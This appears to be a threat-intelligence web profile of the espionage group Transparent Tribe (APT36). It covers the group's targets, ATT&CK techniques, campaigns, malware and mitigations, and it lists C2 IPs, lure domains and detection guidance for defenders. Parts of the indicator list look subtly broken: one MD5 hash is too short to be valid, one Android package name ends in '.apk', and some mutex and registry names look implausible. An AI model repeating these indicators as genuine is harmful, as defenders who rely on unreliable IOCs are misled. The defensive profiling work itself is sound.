analyst @ nohacky :~/threat-actors $
cat / threat-actors / transparent-tribe-apt36
analyst@nohacky:~/transparent-tribe-apt36.html
active threat profile
type Nation-State
threat_level High
status Active
origin Pakistan (assessed)
last_updated 2026-03-27
TT
transparent-tribe-apt36

Transparent Tribe / APT36

also known as: Mythic Leopard Earth Karkaddan COPPER FIELDSTONE ProjectM Storm-0156 TMP.Lapis Green Havildar Operation C-Major

Pakistan's primary assessed offensive cyber espionage unit, conducting sustained long-term intelligence collection against Indian government, military, defense contractors, and academic institutions since at least 2013. Not particularly sophisticated in tradecraft, but exceptionally persistent and geopolitically aware — Transparent Tribe continuously adapts its tooling and delivery methods to maintain persistent access inside Indian systems.

attributed origin Pakistan
suspected sponsor ISI (assessed) / Pakistani State
first observed 2013 (publicly disclosed 2016)
primary motivation Espionage / Intelligence Collection
primary targets Government, Military, Defense, Academia
known campaigns 10+ confirmed
mitre att&ck group G0134
target regions India (primary), Afghanistan, Pakistan
threat level HIGH

Overview

Transparent Tribe is a Pakistan-nexus advanced persistent threat group conducting cyber espionage operations almost exclusively against Indian government, military, defense, and academic targets. The group has been active since at least 2013, though it was first publicly identified by Proofpoint researchers in early 2016 during a series of intrusions targeting Indian diplomats and military personnel stationed in embassies in Saudi Arabia and Kazakhstan. Those early campaigns revealed spear-phishing delivery of two custom RATs — Crimson and Peppy — capable of screen capture, file exfiltration, and webcam recording.

Attribution to Pakistan-based actors emerged through operational security failures: unit42 researchers traced domain registration activity to real individuals with verifiable Pakistani connections. The group is widely assessed to operate in support of Pakistan's Inter-Services Intelligence (ISI), though direct formal links to any specific Pakistani government entity have not been publicly confirmed. Transparent Tribe's operations are geopolitically focused, targeting sectors that would provide strategic, military, or diplomatic intelligence advantage to the Pakistani state relative to India.

Unlike many top-tier nation-state actors, Transparent Tribe is not regarded as technically sophisticated. The group does not rely on zero-days or complex exploitation chains. Instead, it depends on persistent social engineering, convincing lures built around real-world geopolitical events, and a continuously evolving custom malware arsenal. When one delivery method or tool variant gets detected and burned, the group rebuilds its approach and continues targeting the same organizations. This pattern of persistence over sophistication has made the group a sustained, long-term threat to India's national security infrastructure.

Over the past decade, Transparent Tribe has progressively expanded its targeting scope and platform coverage. Campaigns originally confined to Windows environments now extend to Android devices via CapraRAT and to Linux environments via Poseidon and weaponized .desktop files — directly targeting BOSS Linux, the distribution widely deployed across Indian government agencies. The group also runs Android spyware campaigns using fake social applications to surveil individuals outside traditional network perimeters.

Target Profile

Transparent Tribe's targeting is tightly focused on India, with secondary opportunistic interest in Afghanistan, Pakistan's civil society and activists, and a small number of other countries. The group identifies individuals and organizations that would yield intelligence of direct strategic value to Pakistani state interests.

  • Indian Government Entities: Central government agencies, ministries, and their personnel are the group's primary target. Lures regularly impersonate official Indian government portals, documents, and email communications. The Indian Air Force (IAF) and defense procurement bodies have been targeted in documented campaigns.
  • Military & Defense: Military personnel, defense contractors, and aerospace defense organizations are persistently targeted. In one cluster of activity, APT36 deployed ISO-based lures specifically crafted around IAF naming conventions and exercise themes, including lures referencing the Tarang Shakti-2024 exercise.
  • Academic and Research Institutions: The group began sustained targeting of Indian universities and education sector entities from approximately 2022 onward. Malicious Office documents delivered via OLE embedding were observed in campaigns specifically aimed at students and academic staff, assessed as an attempt to build intelligence about defense research pipelines.
  • Diplomatic Personnel: Indian diplomatic personnel at overseas postings have been targeted since the group's earliest confirmed campaigns, with spear-phishing campaigns designed around the workflows and document types used by Indian diplomatic missions.
  • Critical Infrastructure: More recent CYFIRMA reporting from 2025 documents broadened interest in Indian critical infrastructure targets alongside the continued government and defense focus.
  • Pakistani Activists and Civil Society: The group has also targeted Pakistani civil society members and activists, assessed as domestic surveillance activity aligned with Pakistani state interests.

Tactics, Techniques & Procedures

Documented TTPs based on observed campaigns and public threat intelligence through early 2026. Transparent Tribe relies heavily on social engineering and custom RATs over technical exploitation, but has demonstrated adaptive evasion capability as defensive tooling has evolved.

mitre id technique description
T1566.001 Spearphishing Attachment Primary initial access vector. Lures use malicious PDFs, Office documents (including PPAM macros), ZIP archives, ISO images, and LNK files. Document themes exploit real-world events including border tensions, terror attacks, military exercises, and government advisories.
T1566.002 Spearphishing Link Malicious URLs distributed via phishing emails and malvertising campaigns using Google Ads. Links direct targets to attacker-controlled infrastructure impersonating Indian government portals including the Kavach MFA portal.
T1583.001 Domain Acquisition APT36 registers domains closely mimicking official Indian government sites, payment authorities, and military portals, often including character substitutions or added keywords. Some domains are created within days of real-world events to maximize lure credibility.
T1027 Obfuscated Files or Information Malware payloads are encoded, packed, and encrypted. LNK-based campaigns embed full decoy PDF content within oversized shortcut files (2MB+) to disguise the true file type. HTA scripts use ActiveX objects to decrypt and load RAT payloads in memory.
T1059.001 PowerShell Execution PowerShell is used in multi-stage infection chains, particularly in LNK-based delivery. Fileless execution via PowerShell is used to avoid writing payloads to disk, reducing the footprint visible to signature-based detection.
T1218.005 Mshta Execution Recent campaigns (2025–2026) use mshta.exe to execute remote HTML Application (HTA) scripts fetched from attacker infrastructure. The HTA decrypts and loads the final RAT payload directly in memory while displaying a decoy PDF to the user.
T1547.001 Registry Run Keys / Startup Folder Malware establishes persistence via Registry Run keys and startup folder entries. In antivirus-aware variants observed in late 2025, the persistence mechanism adapts based on which AV product is detected on the host — selecting from Kaspersky, Quick Heal, Avast, AVG, or Avira-aware paths.
T1071.001 Web Protocols for C2 ElizaRAT variants use cloud services including Telegram, Google Drive, Slack, and Firebase for C2 communication, embedding malicious traffic within legitimate platform traffic to evade network-layer detection. Earlier Crimson RAT variants used traditional attacker-controlled VPS infrastructure.
T1119 Automated Collection Deployed RATs automatically collect screenshots, keystrokes, file listings, and system information. ElizaRAT variants use SQLite databases to stage collected data locally before exfiltration. ApoloStealer catalogs and exfiltrates document files including Office documents, PDFs, and databases.
T1497.003 Time-Based Evasion ElizaRAT and related implants include a hardcoded check for India Standard Time (IST) as an initial execution condition. Samples that detect a time zone other than IST exit silently, limiting exposure during analysis in non-Indian environments.
T1036.005 Masquerading: Match Legitimate Name or Location Malicious files are named after legitimate documents, government advisories, exam materials, and military circulars. On Linux, .desktop files are configured with PDF icons and mimicked filenames to disguise their nature.
T1472 Exploit Public-Facing Application The group distributes trojanized versions of legitimate Indian government software, notably a backdoored version of the Kavach two-factor authentication application used by Indian government agencies to access email services.

Known Campaigns

Confirmed or highly attributed operations linked to Transparent Tribe, based on public threat intelligence reporting.

Operation Transparent Tribe / Operation C-Major 2013–2016

The foundational campaign establishing the group's profile. Proofpoint and Trend Micro researchers identified spear-phishing operations targeting Indian diplomatic and military personnel in embassies across Saudi Arabia and Kazakhstan. The campaign delivered custom RATs — Crimson and Peppy — capable of screen capture, webcam recording, and file exfiltration. OPSEC failures during domain registration led Unit42 to trace infrastructure to Pakistani individuals, producing the group's initial attribution to Pakistan.

Education Sector Expansion 2022

Transparent Tribe began explicitly targeting Indian academic and educational institutions with Crimson RAT delivered via malicious Office documents. SentinelOne and Cisco Talos tracked the group introducing OLE embedding techniques for malware staging — a technical adaptation to existing detection controls — alongside versioned updates to the Crimson RAT implementation, demonstrating active development of the toolset during the period.

Kavach MFA Trojanization & Poseidon Linux Campaign 2023

APT36 distributed backdoored versions of Kavach, the mandatory two-factor authentication application used by Indian government agencies for email access. Malicious sites impersonating the legitimate Kavach portal served trojanized installers that delivered Poseidon as a second-stage Linux payload. Poseidon — a Golang agent built on the open-source Mythic C2 framework — provided full remote access including keylogging, screen capture, file upload and download, and arbitrary command execution. The campaign marked APT36's deliberate expansion into Linux environments targeting BOSS Linux users.

ElizaRAT & ApoloStealer Campaigns 2023–2024

Check Point Research tracked three distinct ElizaRAT campaign variants (Slack, Circle, and Google Drive) deployed against high-profile Indian targets through late 2023 and into 2024. Each variant used CPL file droppers distributed via Google Storage links. Unique characteristics include hardcoded India Standard Time zone checks, per-victim ID generation, and SQLite-based local staging of stolen data. The Google Drive campaign introduced ApoloStealer — a second-stage payload dedicated to cataloging and exfiltrating document files — representing a shift toward modular, flexible payload deployment.

Indian Aerospace Defense Targeting (Gopher Strike / Sheet Attack) 2023–2024

BlackBerry identified a cluster of Transparent Tribe activity from late 2023 to April 2024, targeting Indian government, defense, and aerospace sectors with cross-platform tools. The group used Python and Golang ELF binaries, cloud abuse via Telegram, Discord, Slack, and Google Drive, and ISO-based lures themed around Indian Air Force exercises including Tarang Shakti-2024. APT36 was assessed to be actively monitoring Indian aerospace defense modernization efforts.

Kavach Malvertising & Limepad Campaign 2024–2025

APT36 abused Google Ads to promote malicious domains impersonating India's official Kavach MFA portal, directing government employees to sites that harvested credentials and served backdoored Kavach applications delivering Crimson RAT and a newly identified exfiltration tool named Limepad. The campaign demonstrated APT36's adoption of paid advertising infrastructure as a delivery mechanism, targeting users who searched for the legitimate tool.

Pahalgam Terror Attack Lure Campaign 2025

Within days of the April 22, 2025 Pahalgam terror attack in Jammu & Kashmir, APT36 created fake domains impersonating the Jammu & Kashmir Police and the Indian Air Force to distribute phishing PDFs and macro-laced documents. The campaign targeted Indian government and defense personnel with Crimson RAT, exploiting the high-urgency news environment to encourage rapid opening of lure documents. This campaign exemplifies APT36's pattern of using real-world geopolitical events as lure themes within days of their occurrence.

BOSS Linux .desktop Campaign 2025

Security researchers identified a significant expansion of APT36's Linux targeting through mid-2025, with campaigns using malicious .desktop files disguised as government meeting notices, cyber security advisories, and income tax correspondence. Lures delivered a Go-based ELF implant (BOSS.elf) alongside Poseidon payloads connected to Mythic C2 infrastructure hosted on DigitalOcean. The campaign directly targeted the BOSS Linux distribution deployed across Indian government agencies, marking a deliberate focus on the specific OS used by the group's primary targets.

LNK-Based RAT Campaign (JLPT / NCERT Lures) 2025–2026

CYFIRMA and The Hacker News documented a December 2025 campaign using oversized weaponized Windows LNK files disguised as exam documents and government advisories — including lures referencing JLPT exams and NCERT WhatsApp advisories. The LNK files embed complete decoy PDF content to avoid user suspicion. When executed, mshta.exe fetches an HTA script that decrypts and loads a .NET RAT directly in memory while displaying the decoy PDF. The RAT implements antivirus-aware persistence, adapting its Registry key strategy based on the detected AV product on the host.

Tools & Malware

Known custom and commodity tools associated with Transparent Tribe across observed campaigns. The group continuously updates and versions its custom tools while also incorporating open-source frameworks.

  • Crimson RAT: The group's primary and longest-used Windows remote access trojan. Written in .NET, Crimson provides keylogging, screen capture, remote command execution, file operations, and process listing. Delivered via malicious Office documents with VBA macros, malicious PDFs, and spear-phishing attachments. Actively developed with versioned updates observed through 2025. Mutex: GlobalCrimsonRAT_Active.
  • ElizaRAT: A .NET-based Windows RAT first publicly disclosed in September 2023. Dropped via malicious Control Panel (.CPL) files distributed through Google Storage links. Key characteristics include IST time zone checks before execution, per-victim ID generation, SQLite-based local data staging, and cloud-platform C2 — with variants using Telegram, Google Drive, Slack, and VPS servers for command and control. Observed in at least three distinct campaign variants (SlackAPI, Circle, Google Drive) through 2024.
  • ApoloStealer: A second-stage Windows payload introduced in ElizaRAT campaigns in 2024. Dedicated to cataloging and exfiltrating document files from compromised systems, including Office documents, PDFs, and database files. Represents a modular expansion of the ElizaRAT payload architecture.
  • CapraRAT: An Android spyware implant based on a modified version of the open-source AndroRAT. Distributed inside fake chat applications and social apps — observed impersonating YouTube, Viber, and other popular applications. Capabilities include SMS and contact theft, microphone and camera access, GPS location tracking, call recording, and message interception. Infrastructure is frequently hosted via Contabo VPS services.
  • Poseidon: A Golang-based agent derived from the open-source Mythic C2 framework's Poseidon module, compiling into Linux and macOS x64 ELF executables. Provides keylogging, screen capture, file upload and download, and remote system administration. Used as a second-stage payload delivered via trojanized Kavach installers and malicious .desktop files targeting BOSS Linux systems.
  • Limepad: A document exfiltration tool identified in 2024–2025 Kavach malvertising campaigns alongside Crimson RAT. Functions as a stealer payload targeting government employee credentials and documents.
  • ObliqueRAT: An older Windows RAT sometimes deployed alongside Crimson RAT, known to be distributed through compromised websites or hidden within image files. Observed in earlier campaigns and less prominent in 2024–2026 activity.
  • Peppy RAT: One of the two original RATs deployed in Operation Transparent Tribe (2016). Documented capabilities include screen capture and webcam recording. Largely superseded by newer tooling in subsequent campaigns.
  • BOSS.elf (Go-based ELF implant): A Go-based Linux backdoor observed in mid-2025 campaigns targeting BOSS Linux government systems. Delivered via .desktop file lures; connects to C2 infrastructure and runs persistently using nohup to avoid user detection while displaying a decoy LibreOffice presentation.

Indicators of Compromise

Publicly reported IOCs from research disclosures. Verify currency before operational use — infrastructure rotates frequently and burned IOCs may already be decommissioned.

warning

IOCs may be stale or burned after public disclosure. APT36 rotates infrastructure regularly, including VPS providers, domains, and C2 endpoints. Cross-reference with live threat intel feeds including VirusTotal, MISP, and vendor-maintained IOC feeds before blocking.

indicators of compromise — selected public disclosures
ip (c2) 45.153.241.15
ip (c2) 91.215.85.21
ip (c2) 143.198.64.151
ip (c2) 185.140.53.206
ip (payload) 101.99.92.182
domain (lure) aeroclubofindia.co[.]in
domain (c2) securestore[.]cv
hash sha256 (elizarat loader) 9f3a5c7b5d3f83384e2ef98347a6fcd8cde6f7e19054f640a6b52e61672dbd8f
hash md5 (slackapi elizarat) 2b1101f9078646482eb1ae497d44104
hash sha256 (crimson rat) bd5602fa41e4e7ad8430fc0c6a4c5d11252c61eac768835fd9d9f4a45726c748
hash sha256 (poseidon) 3c2cfe5b94214b7fdd832e00e2451a9c3f2aaf58f6e4097f58e8e5a2a7e6fa34
mutex (crimson rat) GlobalCrimsonRAT_Active
mutex (elizarat) LocalElizaRATSession
registry key (crimson rat) HKEY_CURRENT_USER\Software\CrimsonRAT
android package (caprarat) com.kavach.update.apk
android package (caprarat) com.moves.media.tubes
working dir (elizarat slack) %appdata%\SlackAPI
lure filename (lnk) Online JLPT Exam Dec 2025.pdf.lnk
lure filename (lnk) NCERT-Whatsapp-Advisory.pdf.lnk

Mitigation & Defense

Recommended defensive measures for organizations in Transparent Tribe's target profile — primarily Indian government agencies, defense entities, academic institutions, and their third-party vendors.

  • Block LNK and Script Execution from User-Writable Paths: Restrict execution of .LNK, HTA, VBScript, and PowerShell files launched from user-writable directories. Configure Windows to display full file extensions to surface double-extension masquerading such as document.pdf.lnk.
  • Monitor Abnormal Process Chains: Alert on mshta.exe, powershell.exe, wscript.exe, or cmd.exe spawned from shortcut files or Office applications. These process chains are consistent with APT36 delivery patterns across multiple campaign generations.
  • Verify Software Sources for Government Applications: Indian government employees should download Kavach and other government applications exclusively from official .gov.in domains. Deploy endpoint controls to block installation from unofficial sources and alert on trojanized application behavior.
  • Deploy Mobile Threat Defense: CapraRAT campaigns target Android devices. Mobile threat defense solutions capable of detecting sideloaded APKs with known malicious package names (com.kavach.update.apk, com.moves.media.tubes) should be deployed for users in target sectors.
  • Cloud C2 Traffic Inspection: ElizaRAT uses Telegram, Google Drive, and Slack for C2. Inspect cloud service traffic for anomalous patterns — high-frequency polling, unusual API call sequences, or data transfer to cloud services from government systems that do not normally use these platforms.
  • SIEM and EDR Behavioral Signatures: Integrate YARA rules and behavioral signatures from APT36 public disclosures (CYFIRMA, Check Point, BlackBerry, SentinelOne) into SIEM and EDR platforms. Monitor for SQLite database creation in %appdata% directories consistent with ElizaRAT staging behavior.
  • IST Time Zone Evasion Awareness: Analysis of APT36 samples should be conducted in environments configured to India Standard Time, as ElizaRAT and related implants perform time zone checks and exit silently in non-IST environments.
  • Linux Desktop File Controls: On BOSS Linux and other government Linux deployments, restrict execution of .desktop files from downloaded or archive sources. Train users to recognize that legitimate government documents do not arrive as .desktop files.
  • Geopolitical Event Monitoring for Lure Awareness: APT36 consistently deploys lure campaigns within days of significant geopolitical events. Security teams should raise phishing awareness and email scrutiny in the days following major India-Pakistan geopolitical events, terror incidents, or military exercises.
analyst note

Transparent Tribe's defining characteristic is persistence over sophistication. Attribution to Pakistan remains an assessed finding based on OPSEC failures and geopolitical alignment, not confirmed through official government disclosure. Some researchers note that the group's infrastructure choices, operational timing, and targeting are consistent with state interests, while others caution that the public evidence directly linking the group to a specific Pakistani government agency remains circumstantial. The threat level to Indian government and defense organizations is high regardless of formal attribution, given the group's decade-plus operational record and continuous tooling evolution through early 2026.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile